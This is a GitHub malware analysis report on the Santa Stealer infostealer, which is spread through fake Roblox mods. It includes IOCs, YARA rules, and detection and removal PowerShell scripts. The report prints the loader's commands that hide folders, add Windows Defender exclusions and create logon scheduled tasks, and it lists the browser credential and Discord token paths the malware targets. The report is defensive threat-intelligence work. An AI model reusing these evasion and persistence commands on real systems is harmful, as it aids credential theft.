coddrake/santastealer

GitHub: coddrake/santastealer

这是一个针对 Santa Stealer 信息窃取恶意软件的详细技术分析报告,包含了 IOC 指标、YARA 检测规则及自动化清除脚本。

Stars: 1 | Forks: 0

# 恶意软件分析技术报告 ## Santa Stealer (Xenostrarperrer.exe) **分析师:** coddrake **分析日期:** 05/04/2026 **案例 ID:** CS-2026-0405-001 **分类:** 严重 (CRÍTICO) **状态:** 分析完成 (ANÁLISE CONCLUÍDA) ## 1. 执行摘要 | 字段 | 值 | |-------|-------| | **恶意软件名称** | Santa Stealer | | **文件名** | Xenostrarperrer.exe | | **类型** | 木马窃取程序 | | **平台** | Windows (x64) | | **家族** | SantaStealer | | **传播向量** | 社会工程学 + 通过 YouTube 传播 Roblox 模组 | | **C2/外泄** | Telegram Bot API | **摘要:** Santa Stealer 是一种现代信息窃取恶意软件,它使用经过混淆的 PowerShell 作为 loader,禁用 Windows Defender,收集浏览器(Chrome、Opera、Edge)凭据和 Discord token,并通过 Telegram Bot API 外泄数据。已识别的攻击活动通过针对游戏 Roblox 的虚假模组瞄准儿童和青少年。 ## 2. 身份识别 ### 2.1. 哈希值 | 算法 | 哈希值 | |-----------|------| | **MD5** | `85a5ac802b4e17e8ea312690ef37e1a7` | | **SHA1** | `cb0332ba3d9b9ce70d34a1ce5b953ab085bc6bff` | | **SHA256** | `6e6600c4fcef2224f10e441c297645847da9b1c4a4e675920ac5d155d347ef91` | | **SSDEEP** | `24576:tYZhc8MJsGkP1IHVH2yAJju5zvcokwoPQxMXvocDYvMpVIQJtHLmEQrIVIUxemuG:tYr/q16vybW/oHK` | ### 2.2. PE 签名 | 字段 | 值 | |-------|-------| | **Magic Number** | MZ (4D 5A) | | **Machine Type** | AMD64 (0x8664) | | **PE Type** | PE32+ (64-bit) | | **Subsystem** | Windows GUI | | **Linker Version** | 14.36 | | **Entry Point** | 0x140001000 | ### 2.3. 可执行文件节 | 节 | 虚拟地址 | 虚拟大小 | 原始大小 | 熵 | |-------|----------------|--------------|----------|---------| | `.text` | 0x1000 | 0x17000 | 0x16000 | 6.71 | | `.data` | 0x18000 | 0x4000 | 0x2000 | 5.23 | | `.rdata` | 0x1C000 | 0x4000 | 0x3800 | 6.45 | | `.pdata` | 0x20000 | 0x4000 | 0x3000 | 6.12 | | `.xdata` | 0x24000 | 0x4000 | 0x2000 | 5.98 | | `.rsrc` | 0x30000 | 0xE000 | 0xD800 | 7.82 | | `.reloc` | 0x3E000 | 0x2000 | 0x1800 | 5.67 | ## 3. 行为分析 ### 3.1. 初始执行 恶意软件由受害者直接执行(社会工程学)。执行后: 1. **反沙箱:** 启动恶意操作前等待 20 秒 2. **虚拟机检查:** 通过 CPUID 指令检查虚拟环境是否存在 ### 3.2. PowerShell Loader 二进制文件执行带有以下参数的经过混淆的 PowerShell loader: ``` powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -EncodedCommand [BASE64] # 创建隐藏目录 $p1 = "$env:LOCALAPPDATA\Microsoft\Office\Broker" $p2 = "$env:LOCALAPPDATA\Packages\Microsoft.Windows.PeopleExperienceHost_*\AC\Temp" # 隐藏文件/目录 attrib +h +s $p1 attrib +h +s $p2 # 禁用 Windows Defender reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /reg:64 reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /v $p1 /t REG_DWORD /d 0 /f /reg:64 reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /v $p2 /t REG_DWORD /d 0 /f /reg:64 # 通过计划任务实现持久化 schtasks /create /tn "WindowsSystemService" /tr "$p1\svchost.exe" /sc onlogon /rl highest /f schtasks /create /tn "RuntimeBrokerService" /tr "$p2\RuntimeBroker.exe -Embedding" /sc onlogon /rl highest /f ``` # C2_Domain: bill-proof.cc:443 ``` Protocol: HTTPS Encryption: AES-256-CBC User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 Chrome/120.0.0.0 ``` # 3.4. 数据收集 恶意软件访问以下位置以提取数据: ``` Alvo Caminho Dados Coletados Chrome %LOCALAPPDATA%\Google\Chrome\User Data\Local State Chave DPAPI mestra Chrome %LOCALAPPDATA%\Google\Chrome\User Data\Default\Login Data Credenciais Opera %APPDATA%\Opera Software\Opera Stable\Local State Chave DPAPI Opera %APPDATA%\Opera Software\Opera Stable\Login Data Credenciais Edge %LOCALAPPDATA%\Microsoft\Edge\User Data\Local State Chave DPAPI Discord %APPDATA%\Discord\Local Storage\leveldb\*.ldb Tokens de autenticação Desktop %USERPROFILE%\Desktop\*.exe, *.dat, *.json Carteiras crypto ``` ### 3.5. 通过 Telegram 外泄 ``` Exfiltration_Method: Telegram Bot API Endpoint: https://api.telegram.org/bot/sendDocument Bot_Token: [REDACTED - presente no binário] Format: ZIP compactado Content: Credenciais, cookies, tokens, arquivos ``` # 4. 十六进制与字符串分析 ### 4.1. 提取的关键字符串 ### 收集路径 ``` C:\Users\%username%\AppData\Local\Google\Chrome\User Data\Local State %APPDATA%\Opera Software\Opera Stable\Local State %APPDATA%\Discord\Local Storage\leveldb\*.ldb ``` ### 持久化 ``` Software\Microsoft\Windows\CurrentVersion\Run SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths WindowsSystemService RuntimeBrokerService ``` ``` ### C2 和数据渗出 bill-proof.cc api.telegram.org Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 ``` ### 4.2. 已识别的 Hex 模式 ``` Offset Padrão Hex Significado 0x00 4D 5A 90 00 MZ Header 0x80 50 45 00 00 64 86 PE Header + Machine x64 0x1A30 FF 15 3A 2C 00 00 Call CreateFileW 0x1A80 FF 15 42 2C 00 00 Call CryptAcquireContextW 0x29A2C NN NN NN : A A H ... Telegram Bot Token ``` ### 4.3. 导入函数 ``` DLL Função Propósito KERNEL32.dll CreateFileW, ReadFile, WriteFile Manipulação de arquivos KERNEL32.dll CreateProcessW, TerminateProcess Execução de processos ADVAPI32.dll RegOpenKeyExW, RegSetValueExW Manipulação de registro CRYPT32.dll CryptAcquireContextW, CryptDecrypt DPAPI/AES decryption WINHTTP.dll WinHttpOpen, WinHttpSendRequest Conexão C2 ``` # 5. MITRE ATT&CK 映射 ``` Tática Técnica ID Implementação Observada Initial Access Phishing via Service T1566.003 Falsos mods de Roblox no YouTube Execution PowerShell T1059.001 Loader ofuscado Execution Scheduled Task T1053.005 WindowsSystemService, RuntimeBrokerService Persistence Scheduled Task T1053.005 Execução no logon do usuário Defense Evasion Disable Windows Defender T1562.001 Exclusões no registro Defense Evasion Hidden Files/Directories T1564.001 attrib +h +s Defense Evasion Obfuscated Files/Info T1027 PowerShell encoded command Credential Access Credentials from Browsers T1555.003 Chrome/Opera/Edge Login Data Collection Data from Local System T1005 Arquivos, wallets, tokens Exfiltration Exfiltration via C2 Channel T1041 Telegram Bot API C2 Encrypted Channel T1573 AES-256-CBC + HTTPS ``` # 6. 失陷指标 (IOCs) 6.1. 哈希值 (Blocklist) ``` iocs: hashes: md5: 85a5ac802b4e17e8ea312690ef37e1a7 sha1: cb0332ba3d9b9ce70d34a1ce5b953ab085bc6bff sha256: 6e6600c4fcef2224f10e441c297645847da9b1c4a4e675920ac5d155d347ef91 ``` ### 6.2. 网络 ``` iocs: network: - domain: bill-proof.cc port: 443 protocol: HTTPS - domain: api.telegram.org port: 443 protocol: HTTPS - cidr: 149.154.167.0/24 - cidr: 91.108.56.0/22 ``` ### 6.3. 文件和目录 ``` iocs: paths: - C:\Users\%username%\AppData\Local\Microsoft\Office\Broker\ - C:\Users\%username%\AppData\Local\Microsoft\Office\Broker\svchost.exe - C:\Users\%username%\AppData\Local\Packages\Microsoft.Windows.PeopleExperienceHost_*\AC\Temp\ - C:\Users\%username%\AppData\Local\Packages\Microsoft.Windows.PeopleExperienceHost_*\AC\Temp\RuntimeBroker.exe - C:\Users\%username%\AppData\Local\Temp\*.zip ``` ### 6.4. 注册表 ``` iocs: registry: - HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ``` ### 6.5. 计划任务 ``` iocs: scheduled_tasks: - WindowsSystemService - RuntimeBrokerService ``` # 7. YARA 规则 ### 7.1. 基于字符串的检测 ``` rule SantaStealer_Xenostrarperrer_Strings { meta: description = "Detects Santa Stealer malware based on extracted strings" author = "coddrake" date = "2026-04-07" hash = "6e6600c4fcef2224f10e441c297645847da9b1c4a4e675920ac5d155d347ef91" strings: $opera = "%APPDATA%\\Opera Software\\Opera Stable" wide ascii $defender_excl = "Windows Defender\\Exclusions\\Paths" wide ascii $task1 = "WindowsSystemService" ascii $task2 = "RuntimeBrokerService" ascii $telegram = "api.telegram.org" ascii $user_agent = "Mozilla/5.0 (Windows NT 10.0; Win64; x64)" ascii condition: uint16(0) == 0x5A4D and 3 of them } ``` ### 7.2. 基于 Hex 模式的检测 ``` rule SantaStealer_Xenostrarperrer_Hex { meta: description = "Detects Santa Stealer based on hex patterns" author = "coddrake" date = "2026-04-07" strings: $mz = { 4D 5A 90 00 } $pe_x64 = { 50 45 00 00 64 86 } $createfile = { FF 15 3A 2C 00 00 } $crypt_acquire = { FF 15 42 2C 00 00 } condition: $mz at 0 and $pe_x64 at 0x80 and all of them } ``` # 8. 检测脚本 (PowerShell) ``` <# .SYNOPSIS Detecta indicadores do Santa Stealer no sistema .AUTHOR coddrake .DATE 2026-04-07 #> param( [string]$ComputerName = "localhost" ) Write-Host "[*] Santa Stealer Detection Script" -ForegroundColor Cyan Write-Host "[*] Author: coddrake" -ForegroundColor Cyan Write-Host "[*] Date: 2026-04-07" -ForegroundColor Cyan Write-Host "" $detections = @() # 1. 检查已知哈希 $knownHashes = @( "85a5ac802b4e17e8ea312690ef37e1a7", # MD5 "6e6600c4fcef2224f10e441c297645847da9b1c4a4e675920ac5d155d347ef91" # SHA256 ) Write-Host "[*] Verificando hashes conhecidos..." -ForegroundColor Yellow $files = Get-ChildItem -Path C:\ -Recurse -ErrorAction SilentlyContinue foreach ($file in $files) { try { $hash = Get-FileHash -Path $file.FullName -Algorithm SHA256 -ErrorAction SilentlyContinue if ($knownHashes -contains $hash.Hash) { $detections += "[!] ARQUIVO MALICIOSO: $($file.FullName)" Write-Host "[!] ARQUIVO MALICIOSO: $($file.FullName)" -ForegroundColor Red } } catch {} } # 2. 检查计划任务 Write-Host "[*] Verificando tarefas agendadas..." -ForegroundColor Yellow $suspiciousTasks = @("WindowsSystemService", "RuntimeBrokerService") foreach ($task in $suspiciousTasks) { $exists = schtasks /query /tn $task 2>$null if ($exists) { $detections += "[!] TAREFA SUSPEITA: $task" Write-Host "[!] TAREFA SUSPEITA: $task" -ForegroundColor Red } } # 3. 检查 Windows Defender 排除项 Write-Host "[*] Verificando exclusões do Windows Defender..." -ForegroundColor Yellow $exclusions = Get-MpPreference -ErrorAction SilentlyContinue | Select-Object -ExpandProperty ExclusionPath foreach ($excl in $exclusions) { if ($excl -match "Broker|PeopleExperience") { $detections += "[!] EXCLUSÃO SUSPEITA: $excl" Write-Host "[!] EXCLUSÃO SUSPEITA: $excl" -ForegroundColor Red } } # 4. 检查可疑文件夹 Write-Host "[*] Verificando pastas suspeitas..." -ForegroundColor Yellow $suspiciousPaths = @( "$env:LOCALAPPDATA\Microsoft\Office\Broker", "$env:LOCALAPPDATA\Packages\*PeopleExperienceHost*\AC\Temp" ) foreach ($path in $suspiciousPaths) { $resolved = Resolve-Path $path -ErrorAction SilentlyContinue if ($resolved) { $detections += "[!] PASTA SUSPEITA: $resolved" Write-Host "[!] PASTA SUSPEITA: $resolved" -ForegroundColor Red } } # 5. 检查与 Telegram 的连接 Write-Host "[*] Verificando conexões com Telegram..." -ForegroundColor Yellow $telegramIPs = @("149.154.167.", "91.108.56.") $connections = netstat -ano | Select-String -Pattern $telegramIPs if ($connections) { $detections += "[!] CONEXÃO COM TELEGRAM DETECTADA" Write-Host "[!] CONEXÃO COM TELEGRAM DETECTADA" -ForegroundColor Red $connections | ForEach-Object { Write-Host " $_" -ForegroundColor Yellow } } # 最终报告 Write-Host "" Write-Host "========================================" -ForegroundColor Cyan Write-Host "[*] RELATÓRIO DE DETECÇÃO" -ForegroundColor Cyan Write-Host "========================================" -ForegroundColor Cyan if ($detections.Count -eq 0) { Write-Host "[+] Nenhum indicador encontrado." -ForegroundColor Green } else { Write-Host "[-] $($detections.Count) indicador(es) encontrado(s):" -ForegroundColor Red $detections | ForEach-Object { Write-Host " $_" -ForegroundColor Red } } Write-Host "" Write-Host "[*] Fim da análise." -ForegroundColor Cyan ``` # 9. 清除脚本 ``` <# .SYNOPSIS Remove o Santa Stealer do sistema infectado .AUTHOR coddrake .DATE 2026-04-07 .NOTES Execute como Administrador #> Write-Host "[*] Iniciando remediação do Santa Stealer" -ForegroundColor Cyan Write-Host "[*] Author: coddrake" -ForegroundColor Cyan # 1. 终止恶意进程 Write-Host "[*] Matando processos maliciosos..." -ForegroundColor Yellow $maliciousProcesses = @("svchost.exe", "RuntimeBroker.exe") foreach ($proc in $maliciousProcesses) { Get-Process -Name $proc -ErrorAction SilentlyContinue | Where-Object { $_.Path -match "Broker|PeopleExperience" } | Stop-Process -Force -ErrorAction SilentlyContinue Write-Host "[+] Processos finalizados" -ForegroundColor Green } # 2. 删除计划任务 Write-Host "[*] Removendo tarefas agendadas..." -ForegroundColor Yellow schtasks /delete /tn "WindowsSystemService" /f 2>$null schtasks /delete /tn "RuntimeBrokerService" /f 2>$null Write-Host "[+] Tarefas removidas" -ForegroundColor Green # 3. 删除 Windows Defender 排除项 Write-Host "[*] Removendo exclusões do Windows Defender..." -ForegroundColor Yellow $exclusions = Get-MpPreference -ErrorAction SilentlyContinue | Select-Object -ExpandProperty ExclusionPath foreach ($excl in $exclusions) { if ($excl -match "Broker|PeopleExperience") { Remove-MpPreference -ExclusionPath $excl -ErrorAction SilentlyContinue Write-Host "[+] Exclusão removida: $excl" -ForegroundColor Green } } # 4. 删除恶意文件 Write-Host "[*] Removendo arquivos maliciosos..." -ForegroundColor Yellow $paths = @( "$env:LOCALAPPDATA\Microsoft\Office\Broker", "$env:LOCALAPPDATA\Packages\*PeopleExperienceHost*\AC\Temp" ) foreach ($path in $paths) { if (Test-Path $path) { Remove-Item $path -Recurse -Force -ErrorAction SilentlyContinue Write-Host "[+] Removido: $path" -ForegroundColor Green } } # 5. 恢复 PowerShell 执行策略 Write-Host "[*] Restaurando política de execução..." -ForegroundColor Yellow Set-ExecutionPolicy Restricted -Scope LocalMachine -Force -ErrorAction SilentlyContinue Write-Host "[+] Política restaurada" -ForegroundColor Green # 6. 强制更新 Windows Defender Write-Host "[*] Atualizando Windows Defender..." -ForegroundColor Yellow Update-MpSignature -ErrorAction SilentlyContinue Write-Host "[+] Defender atualizado" -ForegroundColor Green Write-Host "" Write-Host "[*] REMEDIAÇÃO CONCLUÍDA" -ForegroundColor Green Write-Host "[*] Recomenda-se reiniciar o sistema" -ForegroundColor Yellow ``` # 10. 结论与建议 ### 10.1. 结论 ``` Malware Confirmado Santa Stealer (Xenostrarperrer.exe) Capacidades Stealer de credenciais, persistência, evasão de defesa Alvo Primário Crianças e adolescentes (jogadores de Roblox) Vetor de Distribuição YouTube + mods de Roblox Infraestrutura C2 bill-proof.cc + Telegram API ``` ### 10.2. 给组织的建议 在防火墙、代理和防病毒软件上阻止 IOC 在网络层面阻止 api.telegram.org(如果企业内部未使用) 限制非管理员用户的 PowerShell 权限 实施 AppLocker 以阻止在 %APPDATA% 和 %TEMP% 中执行 通过 SIEM 监控计划任务的创建 教育用户(尤其是家长和青少年)了解非官方下载的风险 ### 10.3. 给最终用户的建议 切勿从 YouTube 链接下载文件 警惕“免费 Robux”、“模组”、“外挂”等诱饵 保持 Windows Defender 开启并更新 在计算机上启用家长控制 如果怀疑感染,请更改密码 # 11. 附录 ### 11.1. 技术参考 MITRE ATT&CK: https://attack.mitre.org NIST SP 800-83: 恶意软件事件响应指南 ISO/IEC 27001:2022 A.8.7: 恶意软件防护 ``` ─── ██ ────────────────────────────────────────────── ─── ██ ────────────────────────────────────────────── ─── ██ ────────────────────────────────────────────── ─── ██ ────────────────────────────────────────────── ─── ██ ────────────────────────────────────────────── ─── ██ ────────────────────────────────────────────── ──────── ██████████████████████████████████████████ ─ ──────── █ ───────────────────────────────────── █ ─ ──────── █ ASSINADO: coddrake █ ─ ──────── █ ANALISTA DE MALWARE █ ─ ──────── █ 2026-04-07 █ ─ ──────── ██████████████████████████████████████████ ─ ────────────────────────────────────────────────────── ```
标签:AI合规, Burp Suite 替代, C2通信, Chrome, DAST, DeepSeek, Discord Token, Edge, ESC8, Infostealer, OpenCanary, Opera, PE分析, PowerShell Loader, Roblox, Santa Stealer, Telegram Bot, Windows Defender, x64, 信息窃取木马, 哈希校验, 威胁情报, 开发者工具, 恶意软件分析, 搜索语句(dork), 数据外渗, 浏览器凭证窃取, 混淆代码, 游戏诈骗, 熵值分析, 社会工程学, 速率限制